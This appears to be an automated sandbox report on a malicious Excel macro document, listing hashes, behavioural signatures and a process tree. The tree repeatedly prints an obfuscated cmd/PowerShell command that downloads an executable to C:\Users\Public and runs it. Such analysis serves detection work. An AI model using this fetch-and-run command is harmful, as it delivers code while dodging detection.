Edit tour
Windows
Analysis Report
827837hj.xls
Overview
General Information
| Sample Name: | 827837hj.xls |
| Analysis ID: | 760118 |
| MD5: | a3a7be7f733771ff24d6286ea49db98c |
| SHA1: | 9017cdc08851f162ae8ca54cfde0841526f4ebbf |
| SHA256: | 348d37d813ca44c373ddd848e39f0ec422982b57e23b502f5ed10a5c86829485 |
| Tags: | xls |
| Infos: | |
 | |
Detection
| Score: | 76 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Multi AV Scanner detection for submitted file
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA with base64 encoded strings
Machine Learning detection for sample
Powershell drops PE file
Obfuscated command line found
Drops PE files to the user root directory
Document exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Document contains an embedded VBA macro which executes code when the document is opened / closed
Sample execution stops while process was sleeping (likely an evasion)
Too many similar processes found
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Document contains embedded VBA macros
Contains functionality to retrieve information about pressed keystrokes
Drops PE files to the user directory
Found large amount of non-executed APIs
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Classification
- System is w10x64
EXCEL.EXE (PID: 5168 cmdline: "C:\Progra m Files (x 86)\Micros oft Office \Office16\ EXCEL.EXE" /automati on -Embedd ing MD5: 5D6638F2C8F8571C593999C58866007E) 
cmd.exe (PID: 5616 cmdline: cmd /c pow ^ers^hell/ W 01 c^u^r l htt^ps:/ /the.earth .li/~sgtat ham/putty/ latest/w32 /putty.e^x e -o C:\Us ers\Public \pin77.exe ;C:\Users\ Public\pin 77.exe MD5: F3BDBE3BB6F734E357235F4D5898582D) - conhost.exe (PID: 5544 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) 
powershell.exe (PID: 628 cmdline: powershell /W 01 cur l https:// the.earth. li/~sgtath am/putty/l atest/w32/ putty.exe -o C:\User s\Public\p in77.exe;C :\Users\Pu blic\pin77 .exe MD5: DBA3E6449E97D4E3DF64527EF7012A10) 
pin77.exe (PID: 5612 cmdline: C:\Users\P ublic\pin7 7.exe MD5: AEB47B393079D8C92169F1EF88DD5696) - cmd.exe (PID: 4252 cmdline:
cmd /c pow ^ers^hell/ W 01 c^u^r l htt^ps:/ /the.earth .li/~sgtat ham/putty/ latest/w32 /putty.e^x e -o C:\Us ers\Public \pin77.exe ;C:\Users\ Public\pin 77.exe MD5: F3BDBE3BB6F734E357235F4D5898582D) - conhost.exe (PID: 1552 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - powershell.exe (PID: 4116 cmdline:
powershell /W 01 cur l https:// the.earth. li/~sgtath am/putty/l atest/w32/ putty.exe -o C:\User s\Public\p in77.exe;C :\Users\Pu blic\pin77 .exe MD5: DBA3E6449E97D4E3DF64527EF7012A10) - cmd.exe (PID: 2336 cmdline:
cmd /c pow ^ers^hell/ W 01 c^u^r l htt^ps:/ /the.earth .li/~sgtat ham/putty/ latest/w32 /putty.e^x e -o C:\Us ers\Public \pin77.exe ;C:\Users\ Public\pin 77.exe MD5: F3BDBE3BB6F734E357235F4D5898582D) - conhost.exe (PID: 1672 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - powershell.exe (PID: 1116 cmdline:
powershell /W 01 cur l https:// the.earth. li/~sgtath am/putty/l atest/w32/ putty.exe -o C:\User s\Public\p in77.exe;C :\Users\Pu blic\pin77 .exe MD5: DBA3E6449E97D4E3DF64527EF7012A10) - cmd.exe (PID: 4468 cmdline:
cmd /c pow ^ers^hell/ W 01 c^u^r l htt^ps:/ /the.earth .li/~sgtat ham/putty/ latest/w32 /putty.e^x e -o C:\Us ers\Public \pin77.exe ;C:\Users\ Public\pin 77.exe MD5: F3BDBE3BB6F734E357235F4D5898582D) - conhost.exe (PID: 5888 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - powershell.exe (PID: 2400 cmdline:
powershell /W 01 cur l https:// the.earth. li/~sgtath am/putty/l atest/w32/ putty.exe -o C:\User s\Public\p in77.exe;C :\Users\Pu blic\pin77 .exe MD5: DBA3E6449E97D4E3DF64527EF7012A10) - pin77.exe (PID: 4696 cmdline:
C:\Users\P ublic\pin7 7.exe MD5: AEB47B393079D8C92169F1EF88DD5696) - conhost.exe (PID: 4488 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - cmd.exe (PID: 1112 cmdline:
cmd /c pow ^ers^hell/ W 01 c^u^r l htt^ps:/ /the.earth .li/~sgtat ham/putty/ latest/w32 /putty.e^x e -o C:\Us ers\Public \pin77.exe ;C:\Users\ Public\pin 77.exe MD5: F3BDBE3BB6F734E357235F4D5898582D) - conhost.exe (PID: 5252 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - powershell.exe (PID: 5980 cmdline:
powershell /W 01 cur l https:// the.earth. li/~sgtath am/putty/l atest/w32/ putty.exe -o C:\User s\Public\p in77.exe;C :\Users\Pu blic\pin77 .exe MD5: DBA3E6449E97D4E3DF64527EF7012A10) - pin77.exe (PID: 5932 cmdline:
C:\Users\P ublic\pin7 7.exe MD5: AEB47B393079D8C92169F1EF88DD5696) - cmd.exe (PID: 2100 cmdline:
cmd /c pow ^ers^hell/ W 01 c^u^r l htt^ps:/ /the.earth .li/~sgtat ham/putty/ latest/w32 /putty.e^x e -o C:\Us ers\Public \pin77.exe ;C:\Users\ Public\pin 77.exe MD5: F3BDBE3BB6F734E357235F4D5898582D) - conhost.exe (PID: 648 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - powershell.exe (PID: 3728 cmdline:
powershell /W 01 cur l https:// the.earth. li/~sgtath am/putty/l atest/w32/ putty.exe -o C:\User s\Public\p in77.exe;C :\Users\Pu blic\pin77 .exe MD5: DBA3E6449E97D4E3DF64527EF7012A10) - pin77.exe (PID: 4988 cmdline:
C:\Users\P ublic\pin7 7.exe MD5: AEB47B393079D8C92169F1EF88DD5696) - cmd.exe (PID: 1756 cmdline:
cmd /c pow ^ers^hell/ W 01 c^u^r l htt^ps:/ /the.earth .li/~sgtat ham/putty/ latest/w32 /putty.e^x e -o C:\Us ers\Public \pin77.exe ;C:\Users\ Public\pin 77.exe MD5: F3BDBE3BB6F734E357235F4D5898582D) - conhost.exe (PID: 64 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - powershell.exe (PID: 5376 cmdline:
powershell /W 01 cur l https:// the.earth. li/~sgtath am/putty/l atest/w32/ putty.exe -o C:\User s\Public\p in77.exe;C :\Users\Pu blic\pin77 .exe MD5: DBA3E6449E97D4E3DF64527EF7012A10) - pin77.exe (PID: 5840 cmdline:
C:\Users\P ublic\pin7 7.exe MD5: AEB47B393079D8C92169F1EF88DD5696) - cmd.exe (PID: 2240 cmdline:
cmd /c pow ^ers^hell/ W 01 c^u^r l htt^ps:/ /the.earth .li/~sgtat ham/putty/ latest/w32 /putty.e^x e -o C:\Us ers\Public \pin77.exe ;C:\Users\ Public\pin 77.exe MD5: F3BDBE3BB6F734E357235F4D5898582D) - conhost.exe (PID: 3788 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - powershell.exe (PID: 1108 cmdline:
powershell /W 01 cur l https:// the.earth. li/~sgtath am/putty/l atest/w32/ putty.exe -o C:\User s\Public\p in77.exe;C :\Users\Pu blic\pin77 .exe MD5: DBA3E6449E97D4E3DF64527EF7012A10) - pin77.exe (PID: 6128 cmdline:
C:\Users\P ublic\pin7 7.exe MD5: AEB47B393079D8C92169F1EF88DD5696) - cmd.exe (PID: 576 cmdline:
cmd /c pow ^ers^hell/ W 01 c^u^r l htt^ps:/ /the.earth .li/~sgtat ham/putty/ latest/w32 /putty.e^x e -o C:\Us ers\Public \pin77.exe ;C:\Users\ Public\pin 77.exe MD5: F3BDBE3BB6F734E357235F4D5898582D) - conhost.exe (PID: 6012 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - powershell.exe (PID: 4876 cmdline:
powershell /W 01 cur l https:// the.earth. li/~sgtath am/putty/l atest/w32/ putty.exe -o C:\User s\Public\p in77.exe;C :\Users\Pu blic\pin77 .exe MD5: DBA3E6449E97D4E3DF64527EF7012A10) - pin77.exe (PID: 4996 cmdline:
C:\Users\P ublic\pin7 7.exe MD5: AEB47B393079D8C92169F1EF88DD5696) - cmd.exe (PID: 5164 cmdline:
cmd /c pow ^ers^hell/ W 01 c^u^r l htt^ps:/ /the.earth .li/~sgtat ham/putty/ latest/w32 /putty.e^x e -o C:\Us ers\Public \pin77.exe ;C:\Users\ Public\pin 77.exe MD5: F3BDBE3BB6F734E357235F4D5898582D) - conhost.exe (PID: 1768 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - powershell.exe (PID: 5508 cmdline:
powershell /W 01 cur l https:// the.earth. li/~sgtath am/putty/l atest/w32/ putty.exe -o C:\User s\Public\p in77.exe;C :\Users\Pu blic\pin77 .exe MD5: DBA3E6449E97D4E3DF64527EF7012A10) - pin77.exe (PID: 5224 cmdline:
C:\Users\P ublic\pin7 7.exe MD5: AEB47B393079D8C92169F1EF88DD5696) - cmd.exe (PID: 5388 cmdline:
cmd /c pow ^ers^hell/ W 01 c^u^r l htt^ps:/ /the.earth .li/~sgtat ham/putty/ latest/w32 /putty.e^x e -o C:\Us ers\Public \pin77.exe ;C:\Users\ Public\pin 77.exe MD5: F3BDBE3BB6F734E357235F4D5898582D) - conhost.exe (PID: 5000 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - powershell.exe (PID: 3408 cmdline:
powershell /W 01 cur l https:// the.earth. li/~sgtath am/putty/l atest/w32/ putty.exe -o C:\User s\Public\p in77.exe;C :\Users\Pu blic\pin77 .exe MD5: DBA3E6449E97D4E3DF64527EF7012A10) - pin77.exe (PID: 5996 cmdline:
C:\Users\P ublic\pin7 7.exe MD5: AEB47B393079D8C92169F1EF88DD5696) - cmd.exe (PID: 5928 cmdline:
cmd /c pow ^ers^hell/ W 01 c^u^r l htt^ps:/ /the.earth .li/~sgtat ham/putty/ latest/w32 /putty.e^x e -o C:\Us ers\Public \pin77.exe ;C:\Users\ Public\pin 77.exe MD5: F3BDBE3BB6F734E357235F4D5898582D) - conhost.exe (PID: 6092 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - powershell.exe (PID: 636 cmdline:
powershell /W 01 cur l https:// the.earth. li/~sgtath am/putty/l atest/w32/ putty.exe -o C:\User s\Public\p in77.exe;C :\Users\Pu blic\pin77 .exe MD5: DBA3E6449E97D4E3DF64527EF7012A10) - pin77.exe (PID: 4768 cmdline:
C:\Users\P ublic\pin7 7.exe MD5: AEB47B393079D8C92169F1EF88DD5696) - cmd.exe (PID: 3176 cmdline:
cmd /c pow ^ers^hell/ W 01 c^u^r l htt^ps:/ /the.earth .li/~sgtat ham/putty/ latest/w32 /putty.e^x e -o C:\Us ers\Public \pin77.exe ;C:\Users\ Public\pin 77.exe MD5: F3BDBE3BB6F734E357235F4D5898582D) - conhost.exe (PID: 3108 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - powershell.exe (PID: 1944 cmdline:
powershell /W 01 cur l https:// the.earth. li/~sgtath am/putty/l atest/w32/ putty.exe -o C:\User s\Public\p in77.exe;C :\Users\Pu blic\pin77 .exe MD5: DBA3E6449E97D4E3DF64527EF7012A10) - pin77.exe (PID: 1412 cmdline:
C:\Users\P ublic\pin7 7.exe MD5: AEB47B393079D8C92169F1EF88DD5696) - cmd.exe (PID: 4648 cmdline:
cmd /c pow ^ers^hell/ W 01 c^u^r l htt^ps:/ /the.earth .li/~sgtat ham/putty/ latest/w32 /putty.e^x e -o C:\Us ers\Public \pin77.exe ;C:\Users\ Public\pin 77.exe MD5: F3BDBE3BB6F734E357235F4D5898582D) - conhost.exe (PID: 5336 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - powershell.exe (PID: 4780 cmdline:
powershell /W 01 cur l https:// the.earth. li/~sgtath am/putty/l atest/w32/ putty.exe -o C:\User s\Public\p in77.exe;C :\Users\Pu blic\pin77 .exe MD5: DBA3E6449E97D4E3DF64527EF7012A10) - pin77.exe (PID: 6136 cmdline:
C:\Users\P ublic\pin7 7.exe MD5: AEB47B393079D8C92169F1EF88DD5696) - cmd.exe (PID: 5420 cmdline:
cmd /c pow ^ers^hell/ W 01 c^u^r l htt^ps:/ /the.earth .li/~sgtat ham/putty/ latest/w32 /putty.e^x e -o C:\Us ers\Public \pin77.exe ;C:\Users\ Public\pin 77.exe MD5: F3BDBE3BB6F734E357235F4D5898582D) - conhost.exe (PID: 1668 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - powershell.exe (PID: 5004 cmdline:
powershell /W 01 cur l https:// the.earth. li/~sgtath am/putty/l atest/w32/ putty.exe -o C:\User s\Public\p in77.exe;C :\Users\Pu blic\pin77 .exe MD5: DBA3E6449E97D4E3DF64527EF7012A10) - pin77.exe (PID: 5468 cmdline:
C:\Users\P ublic\pin7 7.exe MD5: AEB47B393079D8C92169F1EF88DD5696) - cmd.exe (PID: 864 cmdline:
cmd /c pow ^ers^hell/ W 01 c^u^r l htt^ps:/ /the.earth .li/~sgtat ham/putty/ latest/w32 /putty.e^x e -o C:\Us ers\Public \pin77.exe ;C:\Users\ Public\pin 77.exe MD5: F3BDBE3BB6F734E357235F4D5898582D) - conhost.exe (PID: 5600 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - powershell.exe (PID: 4916 cmdline:
powershell /W 01 cur l https:// the.earth. li/~sgtath am/putty/l atest/w32/ putty.exe -o C:\User s\Public\p in77.exe;C :\Users\Pu blic\pin77 .exe MD5: DBA3E6449E97D4E3DF64527EF7012A10) - pin77.exe (PID: 5580 cmdline:
C:\Users\P ublic\pin7 7.exe MD5: AEB47B393079D8C92169F1EF88DD5696) - cmd.exe (PID: 5916 cmdline:
cmd /c pow ^ers^hell/ W 01 c^u^r l htt^ps:/ /the.earth .li/~sgtat ham/putty/ latest/w32 /putty.e^x e -o C:\Us ers\Public \pin77.exe ;C:\Users\ Public\pin 77.exe MD5: F3BDBE3BB6F734E357235F4D5898582D) - conhost.exe (PID: 4556 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - powershell.exe (PID: 4840 cmdline:
powershell /W 01 cur l https:// the.earth. li/~sgtath am/putty/l atest/w32/ putty.exe -o C:\User s\Public\p in77.exe;C :\Users\Pu blic\pin77 .exe MD5: DBA3E6449E97D4E3DF64527EF7012A10) - pin77.exe (PID: 3328 cmdline:
C:\Users\P ublic\pin7 7.exe MD5: AEB47B393079D8C92169F1EF88DD5696) - cmd.exe (PID: 3152 cmdline:
cmd /c pow ^ers^hell/ W 01 c^u^r l htt^ps:/ /the.earth .li/~sgtat ham/putty/ latest/w32 /putty.e^x e -o C:\Us ers\Public \pin77.exe ;C:\Users\ Public\pin 77.exe MD5: F3BDBE3BB6F734E357235F4D5898582D) - conhost.exe (PID: 1296 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - powershell.exe (PID: 3508 cmdline:
powershell /W 01 cur l https:// the.earth. li/~sgtath am/putty/l atest/w32/ putty.exe -o C:\User s\Public\p in77.exe;C :\Users\Pu blic\pin77 .exe MD5: DBA3E6449E97D4E3DF64527EF7012A10) - pin77.exe (PID: 1172 cmdline:
C:\Users\P ublic\pin7 7.exe MD5: AEB47B393079D8C92169F1EF88DD5696) - cmd.exe (PID: 5804 cmdline:
cmd /c pow ^ers^hell/ W 01 c^u^r l htt^ps:/ /the.earth .li/~sgtat ham/putty/ latest/w32 /putty.e^x e -o C:\Us ers\Public \pin77.exe ;C:\Users\ Public\pin 77.exe MD5: F3BDBE3BB6F734E357235F4D5898582D) - conhost.exe (PID: 5680 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - powershell.exe (PID: 5360 cmdline:
powershell /W 01 cur l https:// the.earth. li/~sgtath am/putty/l atest/w32/ putty.exe -o C:\User s\Public\p in77.exe;C :\Users\Pu blic\pin77 .exe MD5: DBA3E6449E97D4E3DF64527EF7012A10) - pin77.exe (PID: 3752 cmdline:
C:\Users\P ublic\pin7 7.exe MD5: AEB47B393079D8C92169F1EF88DD5696) - cmd.exe (PID: 1336 cmdline:
cmd /c pow ^ers^hell/ W 01 c^u^r l htt^ps:/ /the.earth .li/~sgtat ham/putty/ latest/w32 /putty.e^x e -o C:\Us ers\Public \pin77.exe ;C:\Users\ Public\pin 77.exe MD5: F3BDBE3BB6F734E357235F4D5898582D) - conhost.exe (PID: 4496 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - powershell.exe (PID: 1244 cmdline:
powershell /W 01 cur l https:// the.earth. li/~sgtath am/putty/l atest/w32/ putty.exe -o C:\User s\Public\p in77.exe;C :\Users\Pu blic\pin77 .exe MD5: DBA3E6449E97D4E3DF64527EF7012A10) - pin77.exe (PID: 4344 cmdline:
C:\Users\P ublic\pin7 7.exe MD5: AEB47B393079D8C92169F1EF88DD5696) - cmd.exe (PID: 1672 cmdline:
cmd /c pow ^ers^hell/ W 01 c^u^r l htt^ps:/ /the.earth .li/~sgtat ham/putty/ latest/w32 /putty.e^x e -o C:\Us ers\Public \pin77.exe ;C:\Users\ Public\pin 77.exe MD5: F3BDBE3BB6F734E357235F4D5898582D) - conhost.exe (PID: 3660 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - powershell.exe (PID: 4268 cmdline:
powershell /W 01 cur l https:// the.earth. li/~sgtath am/putty/l atest/w32/ putty.exe -o C:\User s\Public\p in77.exe;C :\Users\Pu blic\pin77 .exe MD5: DBA3E6449E97D4E3DF64527EF7012A10) - pin77.exe (PID: 5156 cmdline:
C:\Users\P ublic\pin7 7.exe MD5: AEB47B393079D8C92169F1EF88DD5696) - cmd.exe (PID: 4492 cmdline:
cmd /c pow ^ers^hell/ W 01 c^u^r l htt^ps:/ /the.earth .li/~sgtat ham/putty/ latest/w32 /putty.e^x e -o C:\Us ers\Public \pin77.exe ;C:\Users\ Public\pin 77.exe MD5: F3BDBE3BB6F734E357235F4D5898582D) - conhost.exe (PID: 664 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - powershell.exe (PID: 404 cmdline:
powershell /W 01 cur l https:// the.earth. li/~sgtath am/putty/l atest/w32/ putty.exe -o C:\User s\Public\p in77.exe;C :\Users\Pu blic\pin77 .exe MD5: DBA3E6449E97D4E3DF64527EF7012A10) - pin77.exe (PID: 868 cmdline:
C:\Users\P ublic\pin7 7.exe MD5: AEB47B393079D8C92169F1EF88DD5696) - cmd.exe (PID: 6104 cmdline:
cmd /c pow ^ers^hell/ W 01 c^u^r l htt^ps:/ /the.earth .li/~sgtat ham/putty/ latest/w32 /putty.e^x e -o C:\Us ers\Public \pin77.exe ;C:\Users\ Public\pin 77.exe MD5: F3BDBE3BB6F734E357235F4D5898582D) - conhost.exe (PID: 5828 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - powershell.exe (PID: 5352 cmdline:
powershell /W 01 cur l https:// the.earth. li/~sgtath am/putty/l atest/w32/ putty.exe -o C:\User s\Public\p in77.exe;C :\Users\Pu blic\pin77 .exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
- cleanup
⊘No configs have been found
⊘No yara matches
⊘No Sigma rule has matched
⊘No Snort rule has matched
Click to jump to signature section
Show All Signature Results
AV Detection |   |
|---|
| Source: | ReversingLabs: | |||
| Source: | Virustotal: | Perma Link | ||
| Source: | Joe Sandbox ML: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | Code function: | 12_2_00344B20 | |
| Source: | Code function: | 12_2_00318B60 | |
| Source: | Code function: | 12_2_003A8F62 | |
| Source: | Code function: | 12_2_003A9013 | |
| Source: | Code function: | 20_2_00344B20 | |
| Source: | Code function: | 20_2_00318B60 | |
| Source: | Code function: | 20_2_003A8F62 | |
| Source: | Code function: | 20_2_003A9013 | |
| Source: | Code function: | 20_2_003399C0 | |
| Source: | Code function: | 20_2_00367B40 | |
Software Vulnerabilities | |
|---|
| Source: | Process created: | ||
| Source: | DNS query: | ||
| Source: | DNS query: | ||
| Source: | DNS query: | ||
| Source: | DNS query: | ||
| Source: | DNS query: | ||
| Source: | DNS query: | ||
| Source: | DNS query: | ||
| Source: | DNS query: | ||
| Source: | DNS query: | ||
| Source: | DNS query: | ||
| Source: | DNS query: | ||
| Source: | DNS query: | ||
| Source: | DNS query: | ||
| Source: | DNS query: | ||
| Source: | DNS query: | ||
| Source: | DNS query: | ||
| Source: | DNS query: | ||
| Source: | DNS query: | ||
| Source: | DNS query: | ||
| Source: | DNS query: | ||
| Source: | DNS query: | ||
| Source: | DNS query: | ||
| Source: | DNS query: | ||
| Source: | DNS query: | ||
| Source: | Code function: | 12_2_0035A060 | |
| Source: | Code function: | 12_2_003541F0 | |
| Source: | Code function: | 12_2_003602F0 | |
| Source: | Code function: | 12_2_00328420 | |
| Source: | Code function: | 12_2_003684F0 | |
| Source: | Code function: | 12_2_00372730 | |
| Source: | Code function: | 12_2_0033C7D0 | |
| Source: | Code function: | 12_2_0036E800 | |
| Source: | Code function: | 12_2_002F4877 | |
| Source: | Code function: | 12_2_0030A8D0 | |
| Source: | Code function: | 12_2_0030C97D | |
| Source: | Code function: | 12_2_002FE970 | |
| Source: | Code function: | 12_2_0036C9F0 | |
| Source: | Code function: | 12_2_00358A20 | |
| Source: | Code function: | 12_2_00358B40 | |
| Source: | Code function: | 12_2_0037CDF0 | |
| Source: | Code function: | 12_2_0033CF40 | |
| Source: | Code function: | 12_2_00312FA0 | |
| Source: | Code function: | 12_2_00360FC0 | |
| Source: | Code function: | 12_2_0032B030 | |
| Source: | Code function: | 12_2_003530B0 | |
| Source: | Code function: | 12_2_003150A0 | |
| Source: | Code function: | 12_2_003750F0 | |
| Source: | Code function: | 12_2_0035F1E0 | |
| Source: | Code function: | 12_2_00323220 | |
| Source: | Code function: | 12_2_0036D290 | |
| Source: | Code function: | 12_2_0032F2F0 | |
| Source: | Code function: | 12_2_003072E0 | |
| Source: | Code function: | 12_2_0035F300 | |
| Source: | Code function: | 12_2_00309350 | |
| Source: | Code function: | 12_2_003433A0 | |
| Source: | Code function: | 12_2_003753E0 | |
| Source: | Code function: | 12_2_0034D3D0 | |
| Source: | Code function: | 12_2_0034D650 | |
| Source: | Code function: | 20_2_0035A060 | |
| Source: | Code function: | 20_2_003541F0 | |
| Source: | Code function: | 20_2_003602F0 | |
| Source: | Code function: | 20_2_00328420 | |
| Source: | Code function: | 20_2_003684F0 | |
| Source: | Code function: | 20_2_00372730 | |
| Source: | Code function: | 20_2_0033C7D0 | |
| Source: | Code function: | 20_2_0036E800 | |
| Source: | Code function: | 20_2_002F4877 | |
| Source: | Code function: | 20_2_0030A8D0 | |
| Source: | Code function: | 20_2_0030C97D | |
| Source: | Code function: | 20_2_002FE970 | |
| Source: | Code function: | 20_2_0036C9F0 | |
| Source: | Code function: | 20_2_00358A20 | |
| Source: | Code function: | 20_2_00358B40 | |
| Source: | Code function: | 20_2_0037CDF0 | |
| Source: | Code function: | 20_2_0033CF40 | |
| Source: | Code function: | 20_2_00312FA0 | |
| Source: | Code function: | 20_2_00360FC0 | |
| Source: | Code function: | 20_2_0032B030 | |
| Source: | Code function: | 20_2_003530B0 | |
| Source: | Code function: | 20_2_003150A0 | |
| Source: | Code function: | 20_2_003750F0 | |
| Source: | Code function: | 20_2_0035F1E0 | |
| Source: | Code function: | 20_2_00323220 | |
| Source: | Code function: | 20_2_0036D290 | |
| Source: | Code function: | 20_2_0032F2F0 | |
| Source: | Code function: | 20_2_003072E0 | |
| Source: | Code function: | 20_2_0035F300 | |
| Source: | Code function: | 20_2_00309350 | |
| Source: | Code function: | 20_2_003433A0 | |
| Source: | Code function: | 20_2_003753E0 | |
| Source: | Code function: | 20_2_0034D3D0 | |
| Source: | Code function: | 20_2_0034D650 | |
| Source: | Code function: | 20_2_0032D9F0 | |
| Source: | Code function: | 20_2_002F5AF0 | |
| Source: | Code function: | 20_2_0036DB60 | |
| Source: | Code function: | 20_2_00339B40 | |
| Source: | TCP traffic: | ||
| Source: | TCP traffic: | ||
| Source: | TCP traffic: | ||
| Source: | TCP traffic: | ||
| Source: | TCP traffic: | ||
| Source: | TCP traffic: | ||
| Source: | TCP traffic: | ||
| Source: | TCP traffic: | ||
| Source: | TCP traffic: | ||
| Source: | TCP traffic: | ||
| Source: | TCP traffic: | ||
| Source: | TCP traffic: | ||
| Source: | TCP traffic: | ||
| Source: | TCP traffic: | ||
| Source: | TCP traffic: | ||
| Source: | TCP traffic: | ||
| Source: | TCP traffic: | ||
| Source: | TCP traffic: | ||
| Source: | TCP traffic: | ||
| Source: | TCP traffic: | ||
| Source: | TCP traffic: | ||
| Source: | TCP traffic: | ||
| Source: | TCP traffic: | ||
| Source: | TCP traffic: | ||
| Source: | TCP traffic: | ||
| Source: | TCP traffic: | ||
| Source: | TCP traffic: | ||
| Source: | TCP traffic: | ||
| Source: | TCP traffic: | ||
| Source: | TCP traffic: | ||
| Source: | TCP traffic: | ||
| Source: | TCP traffic: | ||
| Source: | TCP traffic: | ||
| Source: | TCP traffic: | ||
| Source: | TCP traffic: | ||
| Source: | TCP traffic: | ||
| Source: | TCP traffic: | ||
| Source: | TCP traffic: | ||
| Source: | TCP traffic: | ||
| Source: | TCP traffic: | ||
| Source: | TCP traffic: | ||
| Source: | TCP traffic: | ||
| Source: | TCP traffic: | ||
| Source: | TCP traffic: | ||
| Source: | TCP traffic: | ||
| Source: | TCP traffic: | ||
| Source: | TCP traffic: | ||
| Source: | TCP traffic: | ||
| Source: | TCP traffic: | ||
| Source: | TCP traffic: | ||
| Source: | TCP traffic: | ||
| Source: | TCP traffic: | ||
| Source: | TCP traffic: | ||
| Source: | TCP traffic: | ||
| Source: | TCP traffic: | ||
| Source: | TCP traffic: | ||
| Source: | TCP traffic: | ||
| Source: | TCP traffic: | ||
| Source: | TCP traffic: | ||
| Source: | TCP traffic: | ||
| Source: | TCP traffic: | ||
| Source: | TCP traffic: | ||
| Source: | TCP traffic: | ||
